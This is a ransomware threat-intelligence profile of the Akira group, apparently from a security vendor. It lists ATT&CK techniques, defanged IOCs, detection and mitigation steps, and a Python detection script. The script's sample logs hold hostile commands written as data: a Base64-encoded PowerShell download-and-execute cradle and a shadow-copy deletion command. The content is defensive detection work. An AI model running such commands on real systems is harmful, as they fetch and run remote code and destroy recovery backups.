mor3intel Threat Intelligence

Akira
Status: active
Also known as: Akira Ransomware

Akira is a ransomware operation that emerged in March 2023 and runs a retro 1980s-themed leak site. The group primarily targets small and medium-sized businesses, has been linked to the now-defunct Conti ransomware gang, and uses double extortion: data is exfiltrated before encryption and published on the leak site if the ransom is not paid. It has grown rapidly since it appeared.

First Seen: 2023-03
Last Activity: 2025-01
Target Regions: 3 regions
Industries (5 sectors): Education, Finance, Real Estate, Manufacturing, Healthcare
Attack Chain (MITRE ATT&CK)
[Figure: visual representation of the attack phases and techniques used by Akira; the phases and MITRE ATT&CK technique IDs are listed in the table below]

Tactics & Techniques
MITRE ATT&CK mapped tactics and techniques used by this threat actor

Technique ID | Name | Tactic | Description | Reference
T1190 | Exploit Public-Facing Application | Initial Access | Exploits vulnerabilities in Cisco VPN appliances and SonicWall devices for initial access | MITRE
T1078 | Valid Accounts | Initial Access | Logs in over VPN with compromised credentials on accounts that have no MFA | MITRE
T1486 | Data Encrypted for Impact | Impact | Hybrid ChaCha20/RSA file encryption; encrypted files receive the .akira extension | MITRE
Indicators of Compromise (IOCs)
Known IOCs associated with Akira operations

Type | Value | Description | Last Seen
hash (SHA-256) | 3c92bfc71004340ebc00146ced294bc94f49f6a5e212016ac05e7d10fcb3312c | Akira ransomware Windows variant | 2025-01-10
domain | akira[.]onion | Tor leak site | —
filename | akira_readme.txt | Ransom note filename | —

IOCs are defanged: replace "[.]" with "." before using a value in a lookup or block rule.

Detection Guidance
SIEM and EDR detection recommendations for identifying Akira activity
1. Monitor for failed Cisco VPN authentication attempts: bursts of failures against one account or from one source IP, and in particular a successful login that follows such a burst.
2. Detect vssadmin.exe shadow copy deletion (vssadmin delete shadows), which removes the local restore points before encryption.
3. Alert on PowerShell launched with encoded commands (-EncodedCommand and its abbreviations such as -e and -enc); decode the Base64/UTF-16LE payload in the alert so the analyst sees what was run.
4. Monitor for creation of files with the .akira extension, which is the earliest host-level sign that encryption has started.
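The four detections above, plus the ransom-note filename from the IOC table, expressed as detection logic run over a handful of constructed key=value log lines (a Cisco ASA VPN feed and an EDR process/file feed). This is an added example and not code from the page or from mor3intel: the log format, the field names, the five-failure threshold and the sample lines are all assumptions, and a real rule would bind the failure count to a time window and map the fields to your own schema. It goes one step beyond the list by decoding the -EncodedCommand payload and by flagging a VPN success that follows a burst of failures.

```python
import base64
import binascii
import re
from collections import Counter

# Constructed sample payload and log lines; not from the page or from any real incident.
PS_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
PS_B64 = base64.b64encode(PS_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_LOGS = [
    r'source=cisco_asa event=vpn_auth result=failed user=jsmith src_ip=203.0.113.7',
] * 5 + [
    r'source=cisco_asa event=vpn_auth result=success user=jsmith src_ip=203.0.113.7',
    r'source=edr event=process_create host=FS01 image="C:\Windows\System32\vssadmin.exe" cmdline="vssadmin.exe delete shadows /all /quiet"',
    r'source=edr event=process_create host=FS01 image="C:\Windows\System32\vssadmin.exe" cmdline="vssadmin.exe list shadows"',
    'source=edr event=process_create host=WS07 image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    f'cmdline="powershell.exe -NoP -W Hidden -enc {PS_B64}"',
    r'source=edr event=file_create host=FS01 path="D:\Shares\Finance\Q4.xlsx.akira"',
    r'source=edr event=file_create host=FS01 path="D:\Shares\Finance\akira_readme.txt"',
]

VPN_FAIL_THRESHOLD = 5  # assumed threshold; tune per environment and bound it to a time window

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -en, -enc, ...) and to -ec.
_ENC_FLAG = re.compile(r'(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)')


def parse_kv(line: str) -> dict:
    """Parse one key=value line; quoted values may contain spaces and backslashes."""
    return {k: q or u for k, q, u in _KV.findall(line)}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the command line has none."""
    for flag, blob in _ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy Bypass is not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def detect(lines, vpn_fail_threshold=VPN_FAIL_THRESHOLD):
    """Run the detections over the lines in order and return the alerts raised."""
    alerts = []
    failures = Counter()
    for line in lines:
        ev = parse_kv(line)
        if ev.get("source") == "cisco_asa" and ev.get("event") == "vpn_auth":
            user = ev.get("user", "?")
            if ev.get("result") == "failed":
                failures[user] += 1
                if failures[user] == vpn_fail_threshold:  # fire once, when the burst is reached
                    alerts.append({"rule": "vpn_failed_auth_burst", "user": user,
                                   "src_ip": ev.get("src_ip"), "count": failures[user]})
            elif ev.get("result") == "success" and failures[user] >= vpn_fail_threshold:
                # A success after a burst of failures looks like a guessed/stuffed credential.
                alerts.append({"rule": "vpn_success_after_failures", "user": user,
                               "src_ip": ev.get("src_ip"), "failures": failures[user]})
        elif ev.get("event") == "process_create":
            image = ev.get("image", "").lower()
            cmd = ev.get("cmdline", "")
            if image.endswith("vssadmin.exe") and re.search(r"(?i)delete\s+shadows", cmd):
                alerts.append({"rule": "shadow_copy_deletion", "host": ev.get("host"), "cmdline": cmd})
            elif image.endswith(("powershell.exe", "pwsh.exe")):
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    alerts.append({"rule": "powershell_encoded_command", "host": ev.get("host"),
                                   "decoded": decoded})
        elif ev.get("event") == "file_create":
            path = ev.get("path", "")
            name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
            if name.endswith(".akira"):
                alerts.append({"rule": "akira_extension_written", "host": ev.get("host"), "path": path})
            elif name == "akira_readme.txt":  # ransom note filename from the IOC table
                alerts.append({"rule": "akira_ransom_note_written", "host": ev.get("host"), "path": path})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOGS):
        print(alert)
```

The shadow-copy rule deliberately ignores `vssadmin list shadows`, which administrators run routinely, and the encoded-command rule rejects `-ExecutionPolicy` even though it also starts with `-e`; both are the false-positive sources that make naive substring rules noisy.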
Mitigation, Containment & Recovery
Step-by-step guidance for responding to and recovering from this ransomware attack
1. Patch Cisco VPN appliances to the latest version; the exploited VPN vulnerabilities are the group's main initial-access path (T1190 above).
2. Enable MFA on all VPN connections; compromised credentials on accounts without MFA are the other known initial-access path (T1078 above).
3. Isolate affected systems from the network before starting recovery, so that encryption and lateral movement stop while evidence is preserved.
© 2026 mor3intel